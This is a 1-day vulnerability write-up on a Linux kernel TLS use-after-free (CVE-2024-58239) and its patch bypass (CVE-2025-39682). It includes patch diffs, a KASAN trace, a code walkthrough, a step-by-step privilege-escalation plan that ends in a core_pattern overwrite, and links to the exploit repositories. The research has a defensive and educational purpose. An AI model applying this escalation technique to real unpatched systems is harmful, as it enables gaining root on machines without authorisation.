# CVE-2024-58239 1-day analysis
This is my first 1-day exploit.
Patch: [tls: stop recv() if initial process_rx_list gave us non-DATA
](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=fdfbaec5923d9359698cbb286bc0deadbb717504)
I saw `exp407` on the [kernelCTF spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml#) and tried to reproduce the exploit.
I managed to run the exploit on the kernelCTF environment and get the flag:

The log for the exploit is kinda long, due to a kernel WARNING in the middle. However, a warning is not an error and it doesn't kill my exploit ;)

Exploit of CVE-2024-58239: https://github.com/khoatran107/cve-2024-58239
Exploit of the bypass - CVE-2025-39682: https://github.com/khoatran107/cve-2025-39682
## Vulnerability Overview
| Field | Value |
| ------------------ | --------------------------------------- |
| Product | Linux |
| Vendor | Linux |
| Severity | High |
| Affected Versions | From 5.1 to versions prior to 5.4.270, 5.10.211, 5.15.150, 6.1.80, 6.6.19, 6.7.7, 6.8 |
| Tested Versions | kernelCTF mitigation instance, 6.6.0+ |
| Impact | Elevation of Privilege |
| CVE ID | CVE-2024-58239 |
| CWE | CWE-416: Use After Free |
| PoC available? | Yes - the test in the patch commit |
| Patch available? | Yes |
| Exploit available? | Yes - my exploit |
## Note on TLS system before exploiting
For this exploit, I have several important note:
- kTLS is the upper layer protocol for TCP, which essentially means one more "wrapping" layer on the transmit side, and one more "unwrapping" layer on the receive side.
- On receive side:
- A TLS record, both decrypted and un-decrypted is stored inside `struct sk_buff`.
- `rx_list` contain decrypted records, but yet to be received (pushed into here when do `recvmsg` with `MSG_PEEK` option, or when we haven't receive the full record size);
- `sk->sk_receive_queue`: contains un-decrypted records.
- `anchor` is an skb allocated when setting up TLS, its `frag_list` pointer point to the first `skb` of next TLS record in receive queue.
## Vulnerability analysis
Patch:
```diff
diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
index 78aedfc682ba84..43dd0d82b6ed7a 100644
--- a/net/tls/tls_sw.c
+++ b/net/tls/tls_sw.c
@@ -1971,7 +1971,7 @@ int tls_sw_recvmsg(struct sock *sk,
goto end;
copied = err;
- if (len <= copied)
+ if (len <= copied || (copied && control != TLS_RECORD_TYPE_DATA))
goto end;
target = sock_rcvlowat(sk, flags & MSG_WAITALL, len);
```
The second condition makes sure that when `copied != 0` and `control != TLS_RECORD_TYPE_DATA`, the flow end.
So to bypass that, we try to make the second condition being true.
```clike
err = process_rx_list(ctx, msg, &control, 0, len, is_peek);
if (err < 0)
goto end;
copied = err;
if (len <= copied) // patch here
goto end;
```
`err` is the len of just process record in `rx_list`, and control is the type of that record.
Record types are defined [here](https://elixir.bootlin.com/linux/v6.6/source/include/net/tls_prot.h#L16) as an enum. But throughout all the code, the kernel treat them as "2 types":
- DATA (= 23)
- non-DATA ~ control (!= 23)
From [this patch](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/tls?id=62708b9452f8eb77513115b17c4f8d1a22ebf843) of `CVE-2025-39682`, I know for a TLS socket, a `recvmsg` syscall should either:
* return one non-DATA record and stop;
* return merged content of DATA records next to each other.
This bug is that, when `process_rx_list` give a non-DATA record, the `recvmsg` process have to stop, but the vulnerable version continue processing the next record in queue. (\*)
From the mailing list [messages](https://lore.kernel.org/all/018f1633d5471684c65def5fe390de3b15c3d683.1708007371.git.sd@queasysnail.net/), all I know was it get 2 consecutive non-DATA record being merged, there was a PoC for it.
It tooks me another week to fully calm down and think of it like (\*). I try setting record type of the second record to DATA, I get this:

To pin down the root bug. I rebuilt the vulnerable version with KASAN, and run the PoC again:
```bash
user@lts-6:/tmp$ ./exploit
Server listening on port 8080...
Connected from 127.0.0.1:46588
Connected to server!
TLS enabled on connection!
Sent rec1: 1111
Server received: 1111 (record type: 100)
Server sent packet A: AAAA
Server sent packet B: BBBB
Peek packet A: AAAA (record type: 100)
00000000 | 41 41 41 41 00 | AAAA.
Recv packet A: AAAA (record type: 100)
00000000 | 41 41 41 41 00 | AAAA.
Recv packet B: 6�d� (record type: 23)
00000000 | 36 d5 15 64 cc | 6..d.
[ 22.388509] ==================================================================
[ 22.390887] BUG: KASAN: slab-use-after-free in tls_strp_done+0x57/0xc0
[ 22.393386] Read of size 8 at addr ffff88800b71ac00 by task exploit/180
[ 22.395760]
[ 22.396310] CPU: 1 PID: 180 Comm: exploit Not tainted 6.6.18+ #1
[ 22.398596] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 22.402651] Call Trace:
[ 22.403700] <TASK>
[ 22.404595] dump_stack_lvl+0x43/0x60
[ 22.406073] print_report+0xc5/0x660
[ 22.407520] ? preempt_count_add+0x1c/0xc0
[ 22.408585] ? preempt_count_sub+0x14/0xc0
[ 22.409573] ? __virt_addr_valid+0xef/0x190
[ 22.410021] kasan_report+0xc3/0x100
[ 22.410387] ? tls_strp_done+0x57/0xc0
[ 22.410813] ? tls_strp_done+0x57/0xc0
[ 22.411215] tls_strp_done+0x57/0xc0
[ 22.411575] tls_sk_proto_close+0x23a/0x4c0
[ 22.412040] ? __pfx_tls_sk_proto_close+0x10/0x10
[ 22.412590] ? preempt_count_sub+0x14/0xc0
[ 22.413038] ? down_write+0xd2/0x130
[ 22.413441] ? __pfx_down_write+0x10/0x10
[ 22.413872] inet_release+0xa5/0x110
[ 22.414257] __sock_release+0x63/0x120
[ 22.414835] sock_close+0x11/0x20
[ 22.415375] __fput+0x1d8/0x450
[ 22.415714] __x64_sys_close+0x51/0x90
[ 22.416118] do_syscall_64+0x61/0x90
[ 22.416538] ? exit_to_user_mode_prepare+0x1a/0x150
[ 22.417081] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[ 22.417589] RIP: 0033:0x422bd4
[ 22.417913] Code: 00 00 00 0f 1f 00 f3 0f 1e fa 31 c9 e9 15 67 04 00 0f 1f 44 00 00 f3 0f 1e fa 80 3d 8d 34 09 00 00 74 13 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 3c c3d
[ 22.419830] RSP: 002b:00007ffdd7cfd068 EFLAGS: 00000202 ORIG_RAX: 0000000000000003
[ 22.420754] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000422bd4
[ 22.421819] RDX: 0000000001ca0911 RSI: 0000000001ca0910 RDI: 0000000000000003
[ 22.422654] RBP: 00007ffdd7cfd0e0 R08: 00000000004b5820 R09: 0000000000000000
[ 22.423541] R10: 0000000000000001 R11: 0000000000000202 R12: 00007ffdd7cfd1f8
[ 22.424505] R13: 00007ffdd7cfd208 R14: 00000000004b0828 R15: 0000000000000001
[ 22.425417] </TASK>
[ 22.425742]
[ 22.426006] Allocated by task 180:
[ 22.426374] kasan_save_stack+0x2f/0x50
[ 22.426780] kasan_set_track+0x21/0x30
[ 22.427194] __kasan_slab_alloc+0x6a/0x70
[ 22.427598] kmem_cache_alloc_node+0x190/0x3c0
[ 22.428057] __alloc_skb+0x1b3/0x230
[ 22.428452] tls_strp_init+0x3b/0xb0
[ 22.428822] tls_set_sw_offload+0x805/0x920
[ 22.429325] tls_setsockopt+0x859/0x8c0
[ 22.429759] __sys_setsockopt+0x188/0x320
[ 22.430192] __x64_sys_setsockopt+0x60/0x70
[ 22.430619] do_syscall_64+0x61/0x90
[ 22.431051] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[ 22.431911]
[ 22.432099] Freed by task 180:
[ 22.432593] kasan_save_stack+0x2f/0x50
[ 22.433037] kasan_set_track+0x21/0x30
[ 22.433521] kasan_save_free_info+0x27/0x40
[ 22.433948] ____kasan_slab_free+0x11f/0x1a0
[ 22.434480] kmem_cache_free+0x185/0x390
[ 22.434891] process_rx_list+0x2be/0x310
[ 22.435430] tls_sw_recvmsg+0x313/0xd30
[ 22.435860] inet_recvmsg+0x22f/0x240
[ 22.436245] sock_recvmsg+0xff/0x140
[ 22.436655] ____sys_recvmsg+0x142/0x370
[ 22.437079] ___sys_recvmsg+0xe8/0x160
[ 22.437510] __sys_recvmsg+0xe7/0x170
[ 22.437905] do_syscall_64+0x61/0x90
[ 22.438272] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[ 22.438857]
[ 22.439121] The buggy address belongs to the object at ffff88800b71ab40
[ 22.439121] which belongs to the cache skbuff_head_cache of size 224
[ 22.440870] The buggy address is located 192 bytes inside of
[ 22.440870] freed 224-byte region [ffff88800b71ab40, ffff88800b71ac20)
```
Great, UAF. With detailed report by KASAN about where it's allocated, and previously freed.
## KASAN report analysis
### UAF Read at offset 192
* From `tls_strp_done`.
```c
tls_strp_done()
tls_strp_anchor_free()
struct skb_shared_info *shinfo = skb_shinfo(strp->anchor);
// anchor->head @ offset 192
#define skb_shinfo(SKB) ((struct skb_shared_info *)(skb_end_pointer(SKB)))
#ifdef NET_SKBUFF_DATA_USES_OFFSET
static inline unsigned char *skb_end_pointer(const struct sk_buff *skb)
{
return skb->head + skb->end;
}
```
* The field `sk_buff::head` is at offset 192:
```C
gef> p (*(struct sk_buff*)0).head
Cannot access memory at address 0xc0
gef> p/d 0xc0
$4 = 192
```
* So we can conclude the object being UAF is `struct sk_buff`.
### Allocate
* From the backtrace, I check the function `tls_strp_init` (initializing stream parser):
```C
int tls_strp_init(struct tls_strparser *strp, struct sock *sk)
{
memset(strp, 0, sizeof(*strp));
strp->sk = sk;
strp->anchor = alloc_skb(0, GFP_KERNEL); // [*] here
if (!strp->anchor)
return -ENOMEM;
INIT_WORK(&strp->work, tls_strp_work);
return 0;
}
```
* The freed skb object is the anchor object, it’s allocated from a dedicated cache called `skbuff_cache`. So… I either have to do cross cache attack, or attack by allocating another skb. The first option is blocked, as I am targeting mitigation instance, which have `CONFIG_SLAB_VIRTUAL`.
### Deallocate
* It’s freed inside `consume_skb` of `process_rx_list`, my question is *how the anchor even get into there?*
* Yes I can confirm that it’s in fact inside `rx_list`, in my second receive (when the BBBB packet is expected):
```C
gef> chain &ctx->rx_list
[+] head address: 0xffff888001a1b630
[+] next pointer offset: 0x0
[1] -> 0xffff88800b81b500
[2] -> 0xffff888001a1b630 (head)
gef> p ctx->strp->anchor
$6 = (struct sk_buff *) 0xffff88800b81b500
```
### How the `anchor` get into `rx_list`?
* One hypothesis I can think of is that, the skb next pointer of the `BBBB` skb point to `anchor`. But that might not be the case, since the first packet of a TLS record is only added as a `frag_list` of anchor:
```
skb_shinfo(strp->anchor)->frag_list = first;
```
* I think the magic lies in the first receive. So let walk through what happens there.
```C=
int tls_sw_recvmsg(struct sock *sk,
struct msghdr *msg,
size_t len,
int flags,
int *addr_len)
{
// [...]
err = process_rx_list(ctx, msg, &control, 0, len, is_peek); // return AAAA - record type 100
if (len <= copied) // the patch [2/5] make it stop right here
goto end;
// [...]
while (/* ... */) {
// [...]
if (zc_capable /* true */ && to_decrypt <= len /* 0 <= 0x100, true */ &&
tlm->control == TLS_RECORD_TYPE_DATA /* true */)
darg.zc = true; // set zc = true
// [...]
err = tls_rx_one_record(sk, msg, &darg); // [1]
// [...]
err = tls_record_content_type(msg, tls_msg(darg.skb), &control); // [2]
if (err <= 0) { // err = 0
DEBUG_NET_WARN_ON_ONCE(darg.zc);
tls_rx_rec_done(ctx);
put_on_rx_list_err:
__skb_queue_tail(&ctx->rx_list, darg.skb); // [3] here darg.skb = ctx->strp->anchor
goto recv_end;
}
// [...]
}
// [...]
}
```
* After [1], we already have `darg.skb = ctx->strp->anchor`. That suggests another deep dive into `tls_rx_one_record` function, with `zc` being true.
```C=
static int tls_rx_one_record(struct sock *sk, struct msghdr *msg,
struct tls_decrypt_arg *darg)
{
// [...]
err = tls_decrypt_device(sk, msg, tls_ctx, darg);
if (!err) // always true
err = tls_decrypt_sw(sk, tls_ctx, msg, darg);
// [...]
}
static int
tls_decrypt_sw(struct sock *sk, struct tls_context *tls_ctx,
struct msghdr *msg, struct tls_decrypt_arg *darg)
{
// [...]
err = tls_decrypt_sg(sk, &msg->msg_iter, NULL, darg);
// [...]
}
static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
struct scatterlist *out_sg,
struct tls_decrypt_arg *darg)
{
// [...]
if (darg->zc /* true */ && (out_iov /* out_iov = &msg->msg_iter != NULL */ || out_sg)) {
clear_skb = NULL; // [4]
if (out_iov)
n_sgout = 1 + tail_pages +
iov_iter_npages_cap(out_iov, INT_MAX, data_len);
else
n_sgout = sg_nents(out_sg);
} else {
darg->zc = false;
clear_skb = tls_alloc_clrtxt_skb(sk, skb, rxm->full_len);
// [...]
}
// [...]
darg->skb = clear_skb /* NULL, from [4] */ ?: tls_strp_msg(ctx); // [5]
clear_skb = NULL;
// [...]
}
static inline struct sk_buff *tls_strp_msg(struct tls_sw_context_rx *ctx)
{
DEBUG_NET_WARN_ON_ONCE(!ctx->strp.msg_ready || !ctx->strp.anchor->len);
return ctx->strp.anchor; // [6]
}
```
* Because of [4], in [5] & [6], `darg->skb` is set to `ctx->strp.anchor`. And because at [2], the record type of current record (data) differs from previous record (non-data), the `darg->skb` is insert into `rx_list` [3].
* The `BBBB` record is not dropped. Just that the return value is not true for the len of response. When I hexdump all content of the buffer passed into the syscall, I get this. Which means, with `zc` being true, the data is decrypt straight into userspace buffer, no queueing into `rx_list` happens with the record:
```
Recv packet A (record type: 100)
00000000 | 41 41 41 41 00 42 42 42 42 00 | AAAA.BBBB. |
```
* Seems like `darg->skb` is always equal to anchor when the record type is data. What makes the difference here is `tls_record_content_type` return 0 due to different record type compared to the previous one.
## Exploit
### Brainstorm
Here’s the original flow of actions that trigger the bug:
1. server send A * 100h (record type non-DATA)
2. server send B * 100h (record type DATA)
3. client peek 100h → A * 100h is in `rx_list` ; `skb_shinfo(anchor)->frag_list` = head of packet B
4. client receive 200h → get A * 100h and B * 100h; `anchor` is in `rx_list`. B is freed, but `skb_shinfo(anchor)->frag_list` is still B.
5. client receive 200h → `anchor` get freed, but still in `ctx->strp.anchor`, some mysterious data is returned.
6. close client fd → UAF-read the `anchor` object.
If we spray skb object to reclaim the victim between (5) and (6), we may get something.
Since this is a `skb` double free. I assume I can turn this into a page UAF, by spraying a bunch of skb with frags[0] = page order 0, then free using the UAF-free, then reallocate with pipe spray, then free with my sprayer. That's when we have page UAF. The last step is doing `signalfd` spray to reclaim that order-0 page as a slab in `filp` cache.
### Full process
1. Trigger the bug, causing `anchor` being inside `rx_list` (while still pointed by `ctx->strp.anchor`); `skb_shinfo(anchor)->frag_list = skb B`, with `skb B` is freed.
2. Spray to reclaim `skb B`.
3. Freeing both `anchor` and `skb B` through `splice` syscall.
4. Reclaim `anchor` by spraying `skb` with a specific size (0xec0 + 0x1000), setting `skb_shinfo(anchor)->frags[0]` being a victim page of order 0. Now `anchor` is pointed by an `sk->sk_receive_queue` and `ctx->strp.anchor`. And `skb_shinfo(anchor)->frag_list = NULL`.
5. Release the anchor and the page through `sk->sk_receive_queue`, by `recv` syscall. That also does UAF-free the order-0 page to buddy allocator.
6. Reclaim that order-0 page using pipe spray.
7. Release that page back to buddy allocator, by freeing anchor through `ctx->strp.anchor`.
8. Reclaim that order-0 page as a slab in `filp` cache.
9. Overwriting `core_pattern`.
10. Trigger segfault -> ROOT.
## Side notes
### `skb` is sprayable
The `skb` object isn't completely wiped out in `consume_skb()`: its `skb_shinfo(skb)->frags[]` is kept. So double freeing `skb` object leads to double freeing `struct page*` object ~ double freeing a page.
### Spray object
Using some experience, I found out that with `AF_UNIX` TCP packet of len X, the first `0xec0` bytes is the in `skb_shinfo(skb)->head`. And for the remaining `Y = X - 0xec0` bytes, they are split into pages contained in `skb_shinfo(skb)->frags[]`, and they want the least number of page of order `[0, PAGE_ALLOC_COSTLY_ORDER (3)]`.
If Y is smaller than `PAGE_SIZE << PAGE_ALLOC_COSTLY_ORDER` (0x8000). It's rounded to the nearest page size. If not, allocate page order 3, and do Y -= `PAGE_SIZE << 3`...
With that, I write an `SkbSprayer` object to spray skb objects, with customizable num objects and data size.
### Double free
The SLUB allocator only panic when `free(x)` if x is head of its slab's freelist. So we can spray multiple target and deallocate before freeing the second time, to make sure x is not head of its slab's freelist => doesn't panic.
### Why `splice`?
* After being reclaimed by a unix TCP skb, the field `next` and `prev` of the object points to field `struct sk_buff_head* sk_receive_queue` of `struct sock`, creating a cyclic linked-list. When we do normal `tls_sw_recvmsg`, it doesn't unlink from the queue, causing `consume_skb` to traverse the `next` pointer, freeing an invalid pointer (`sock + 0xd8`). So I find places where `ctx->rx_list` is used, and preferably, where we have `__skb_dequeue`. And I found 2 place:
* `tls_sw_splice_read`
* `tls_sw_read_sock`
I try the first one and it has what I need:
```C=
ssize_t tls_sw_splice_read(struct socket *sock, loff_t *ppos,
struct pipe_inode_info *pipe,
size_t len, unsigned int flags)
{
// [...]
if (!skb_queue_empty(&ctx->rx_list)) {
skb = __skb_dequeue(&ctx->rx_list); // skb->next & prev set to NULL
} else {
// [...]
}
rxm = strp_msg(skb);
tlm = tls_msg(skb);
if (tlm->control != TLS_RECORD_TYPE_DATA /* false */) {
err = -EINVAL;
goto splice_requeue;
}
chunk = min_t(unsigned int, rxm->full_len, len);
copied = skb_splice_bits(skb, sk, rxm->offset, pipe, chunk, flags);
if (copied < 0 /* false */)
goto splice_requeue;
if (chunk < rxm->full_len /* can set to false */) {
rxm->offset += len;
rxm->full_len -= len;
goto splice_requeue;
}
consume_skb(skb); // no more invalid free here.
```
Using this, no more invalid free in SLUB allocator.
### Pipe spray weird behavior
During my first n-day analysis, I learned that for pipe spraying, kernel only allocate a page order-0 for the pipe when we call `write(0x1000)`.
However, when developing this exploit some weird things occur: I do `write(0x1000)`, then I try to `read(0x2000)`; and some first 50-ish pipes return 0x2000, and then they return 0x1000.
I would dive into this problem if I have more time. But for the quick fix of that, I just assume the first page is allocated when creating the socket, and only care about the last page when doing spray.
### Page UAF to ROOT
For this step, I do as the previous n-day: `signalfd` spray. Except that, I use arbitrary write primitive to write straight into `core_pattern`, instead of just writing `cred`.
### Weakness of this exploit
My exploit relies on 2 facts in the kernel:
- freeing `struct sk_buff` object doesn't clear its `frags` array.
- double free detection in SLUB allocator is so naive, it only PANIC when a slot is freed and is **head** of its slab's freelist.
If one of those two is fixed -> The exploit dies.
## Success rate
I run `calc_AC_rate.py` to test the exploit 100 times, and the result is `50/100`.
That definitely can be improved. As most of the fail attempts, I get this backtrace:
```
[ 4.050330] ? die+0x32/0x80
[ 4.050809] ? do_trap+0xd6/0x100
[ 4.051365] ? __slab_free+0x16c/0x380
[ 4.052198] ? do_error_trap+0x6a/0x90
[ 4.052767] ? __slab_free+0x16c/0x380
[ 4.053350] ? exc_invalid_op+0x4c/0x60
[ 4.053916] ? __slab_free+0x16c/0x380
[ 4.055031] ? asm_exc_invalid_op+0x16/0x20
[ 4.055675] ? tcp_rcv_state_process+0x791/0xef0
[ 4.056527] ? __slab_free+0x16c/0x380
[ 4.057097] ? lock_timer_base+0x61/0x80
[ 4.057795] ? tcp_get_metrics+0x142/0x380
[ 4.058560] ? tcp_rcv_state_process+0x791/0xef0
[ 4.059265] kmem_cache_free+0x599/0x5e0
[ 4.059915] tcp_rcv_state_process+0x791/0xef0
[ 4.060918] ? security_sock_rcv_skb+0x31/0x50
[ 4.061857] ? sk_filter_trim_cap+0x11a/0x290
[ 4.062558] tcp_v4_do_rcv+0xcd/0x280
[ 4.063281] tcp_v4_rcv+0xf81/0x1010
[ 4.063832] ? raw_local_deliver+0xcd/0x250
[ 4.064668] ip_protocol_deliver_rcu+0x32/0x320
[ 4.065355] ip_local_deliver_finish+0x7a/0xa0
[ 4.066455] ip_sublist_rcv_finish+0x7e/0x90
[ 4.067231] ip_sublist_rcv+0x1e1/0x220
[ 4.067919] ? __netif_receive_skb_core.constprop.0+0xbf/0x1080
[ 4.068822] ip_list_rcv+0x139/0x170
[ 4.069362] __netif_receive_skb_list_core+0x29d/0x2c0
[ 4.070173] ? __pfx_csum_block_add_ext+0x10/0x10
[ 4.071054] netif_receive_skb_list_internal+0x1e1/0x310
[ 4.072068] napi_complete_done+0x6e/0x1a0
[ 4.072752] virtnet_poll+0x40d/0x5a0
[ 4.073313] __napi_poll+0x28/0x1c0
[ 4.073854] net_rx_action+0x14c/0x2d0
[ 4.074622] ? vp_vring_interrupt+0x73/0x90
[ 4.075746] __do_softirq+0xf6/0x30f
[ 4.076379] __irq_exit_rcu+0x79/0xc0
[ 4.077356] common_interrupt+0xb9/0xd0
```
I think there must be a way to `setsockopt` or something to disable that.
## Patch bypass
### CVE-2025-39682
Patch commit: [tls: fix handling of zero-length records on the rx_list](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/tls?id=62708b9452f8eb77513115b17c4f8d1a22ebf843)
Exploit code: https://github.com/khoatran107/cve-2025-39682

With a similar exploit approach, I write one exploit for CVE-2025-39682.
Success rate: `79/100`. I develop this exploit later and change it a little bit, so it's more stable.
Diff:
```diff=
diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
index 51c98a007ddac4..bac65d0d4e3e1e 100644
--- a/net/tls/tls_sw.c
+++ b/net/tls/tls_sw.c
@@ -1808,6 +1808,9 @@ int decrypt_skb(struct sock *sk, struct scatterlist *sgout)
return tls_decrypt_sg(sk, NULL, sgout, &darg);
}
+/* All records returned from a recvmsg() call must have the same type.
+ * 0 is not a valid content type. Use it as "no type reported, yet".
+ */
static int tls_record_content_type(struct msghdr *msg, struct tls_msg *tlm,
u8 *control)
{
@@ -2051,8 +2054,10 @@ int tls_sw_recvmsg(struct sock *sk,
if (err < 0)
goto end;
+ /* process_rx_list() will set @control if it processed any records */
copied = err;
- if (len <= copied || (copied && control != TLS_RECORD_TYPE_DATA) || rx_more)
+ if (len <= copied || rx_more ||
+ (control && control != TLS_RECORD_TYPE_DATA))
goto end;
target = sock_rcvlowat(sk, flags & MSG_WAITALL, len);
```
The previous patch can be bypass by setting `copied` to 0, which means sending a zero-length record. Then the flow goes on like the original bug, returning 0 at `tls_record_content_type`, causing `anchor` to goes inside `rx_list`.
On transmit side, kTLS wrapper doesn't allow sending records with length 0 => I don't set up kTLS encryption for transmission, but encrypt the attack record before hand, and send it as a normal TCP segment.
Of course I don't write my own AES_CCM_128 encryption function in C. I take the server's encrypted segment from [the test for the patch](https://lore.kernel.org/all/20250820021952.143068-2-kuba@kernel.org/).
## Useful links
* [Linux Kernel TLS Part 1 & 2 - Pumpkin (@u1f383)](https://u1f383.github.io/linux/2025/01/20/linux-kernel-tls-part-1.html)
* [Analysis of CVE-2025-37756, an UAF Vulnerability in Linux KTLS - Pumpkin (@u1f383)](https://u1f383.github.io/linux/2025/09/03/analysis-of-CVE-2025-37756-an-uaf-vulnerability-in-linux-ktls.html)
* [Kernel TLS docs](https://docs.kernel.org/networking/tls.html)
* [tools/testing/selftests/net/tls.c - utilities & example for setting up a TLS connection](https://elixir.bootlin.com/linux/v6.6/source/tools/testing/selftests/net/tls.c)
* [CVE-2024-58239 test of the patch](https://lore.kernel.org/all/018f1633d5471684c65def5fe390de3b15c3d683.1708007371.git.sd@queasysnail.net/)
* [CVE-2025-39682 test of the patch](https://lore.kernel.org/all/20250820021952.143068-2-kuba@kernel.org/)
## Thoughts
The bug really give me an experience of doing 1-day analysis (I think half part of this process feels like 0-day analysis).
Reading the original "primitive" - `merging 2 non-DATA records`, I continuously questioned myself whether or not I was trolled. I thought that `exp401` might be someone testing for their auto form submission script, and the CVE is in fact un-exploitable. The thought is not there without a reason. The linux CVE team has been known for giving away free CVE numbers to weird non-dangerous bugs.
I kept the doubt in my head, trying to exploit, while saying to myself "this is a troll". I was so stressed about it. That's what people experience when they do 0-day research on linux kernel, right? Having a bug and not knowing if it gives a strong enough primitive to do LPE.
In addition to that, I was given a deadline of one month to do 1-day analysis. And I dared to chose `net/tls` - a subsystem I have never ever touch. I didn't even know a thing about TLS, lol.
The moment the crash pop up, I was so relieved. It took a weeks to reach that point. And I thought if that's a normal UAF, 1 week might be enough.... But a week and a half passed, and I realized it's not that easy.
The last week was full of emotions. The pipe spray method I always trust backfired on me, there was some unusual behavior that took me 2 days to figure out. I finished the exploit code and leverage to root 2 hours before the end of my deadline.